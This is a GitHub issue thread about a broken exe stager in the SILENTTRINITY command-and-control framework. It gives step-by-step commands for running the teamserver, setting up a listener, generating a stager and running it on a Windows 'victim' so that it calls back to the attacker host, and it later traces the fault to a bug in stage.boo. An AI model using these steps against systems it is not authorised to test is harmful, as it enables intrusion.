### ISSUE TITLE
[BUG] exe stager not working

### ISSUE THREAD

**Issue by OscarAkaElvis** [byt3bl33d3r/SILENTTRINITY#103]
Hi, I'd like to report what I think could be a bug and a couple of suggestions (non feature requests, I know PR is the right path for that). Thanks in advance.

## Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

* SILENTTRINITY Version: Zuiikin 0.4.0dev
* OS running the Client: BlackArch (not relevant, same result on Parrot Linux)
* Python Version Running the Client 3.7.4
* OS running the TeamServer: BlackArch (not relevant, same result on Parrot Linux)
* Python version running the Teamserver: 3.7.4

## Expected Behavior

1. Receive a stager once the .exe file is run under windows (AV is off). It was working yesterday and is failing today, so it seems some kind of bug.

2. Another expected behavior is to launch a "sessions" command without seeing any error even without any active session.

## Current Behavior

1. Just a timeout. It worked for me yesterday, but after doing git pull with the commits done today is not working anymore. Is hard to say you which exactly version due the messy versioning method. As a suggestion I could say that commits to master shouldn't be allowed (the branch can be protected on github) and after some commits on a a dev branch, a PR to master could be done and tagged as a new version. In this way is easier for you and for users to track what is happening and when. A CHANGELOG.md file could also help here. The sha1 of the commit on which I'm testing is `b43044f2a343ff497ea9d1c931401a6523074904`

2. On the screenshot you can see (upper-left) an error shown on teamserver console after launching a simple "sessions" command while there is no any active session.

## Failure Information

1. Check the screenshot. The cmd windows command is showing a "Timeout". Of course, the windows (victim) and the attacker (Linux with teamserver and c&c client) are in a local LAN with full network visibility between them.

### Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. After installing, pipenv, etc etc... Launch the teamserver `python3 teamserver.py 192.168.0.161 xxxxxxx`
2. Connect client c&c to teamserver `python3 st.py wss://elvis:xxxxx@192.168.0.161:5000`
3. Set up a listener: `listeners, use https, options, start https`
4. Set up a stager: `stagers, use exe, generate https`
5. Copy stager.exe to windows victim machine
6. Get the right guid and psk from sqlite db on the teamserver
7. Execute the stager: `stager.exe 206e3d7a-8df6-4c73-bdb7-9a6cd38ce24e 84e8b494da44aa861e11cc67d35dde9fa92230698d015c1eb67b40e6d2ae5f2b https://192.168.0.161`
   ...

### Failure Logs

![image](https://user-images.githubusercontent.com/5803348/65363592-ffbff800-dc0c-11e9-88ca-ec758823311f.png)

As a final suggestion I can say that after creating the .exe stager... is hard to know what is the guid and the psk. As you can see in the screenshot (bottom-right) I opened the sqlite db to get the right values. It could be nice to print on client c&c screen the right values once the stager is created to avoid that manual searching of the right values.

Thanks! this tool seems promising!

**Comment by OscarAkaElvis** [comment]
Quite weird... doing more tests sometimes i receive the stager but in a loop again and again and again very quickly.

![image](https://user-images.githubusercontent.com/5803348/65364144-1e73be00-dc10-11e9-9ed2-ab11af06e260.png)

**Comment by byt3bl33d3r** [comment]
@OscarAkaElvis I'm going to be digging into this in an hour or so after I murder some fools in Borderlands

**Comment by hackabean** [comment]
Below is the loutput from powershell stager from latest SILENTTRINITY git pull. I think the problem files with stage.boo file:

Stage.boo(411,34): BCE0044: Block must be indented.
[*] Attempting HTTP POST to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[*] Attempting HTTP GET to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[*] Downloaded 569008 bytes

[*] Compiling Stage Code
[-] Error(s) compiling script, this probably means your Boo script has bugs

if you replace that file with the old one, you wont see this problem.

**Comment by byt3bl33d3r** [comment]
Fixed, this was my bad. Was playing with stuff the other day with the stage.boo file and forgot to remove it from the commit.
Cheers

**Comment by ajnik** [comment]
Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?

**Comment by glides** [comment]
> Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?


`stager.exe <guid> <psk> <CallBack_URL>`

**Comment by ajnik** [comment]
> > Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
> 
> `stager.exe <guid> <psk> <CallBack_URL>`

Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager

**Comment by glides** [comment]
> > > Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
> > 
> > 
> > `stager.exe <guid> <psk> <CallBack_URL>`
> 
> Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager

I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet ([here](https://github.com/byt3bl33d3r/SILENTTRINITY/pull/134)). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager.

BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.

**Comment by ajnik** [comment]
> > > > Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
> > > 
> > > 
> > > `stager.exe <guid> <psk> <CallBack_URL>`
> > 
> > 
> > Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager
> 
> I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet ([here](https://github.com/byt3bl33d3r/SILENTTRINITY/pull/134)). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager. Thinking about it now, there should probably be an option to 'generate' a vanilla binary and one with the guid/psk/CB_urls embedded in it (so there is no need to supply command line arguments) along with the option to use an already generated guid/psk or a new pair.
> 
> BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.

Gotcha. I was in fact thinking of a binary where GUID/PSK/IP are already present. Thanks for clarifying.
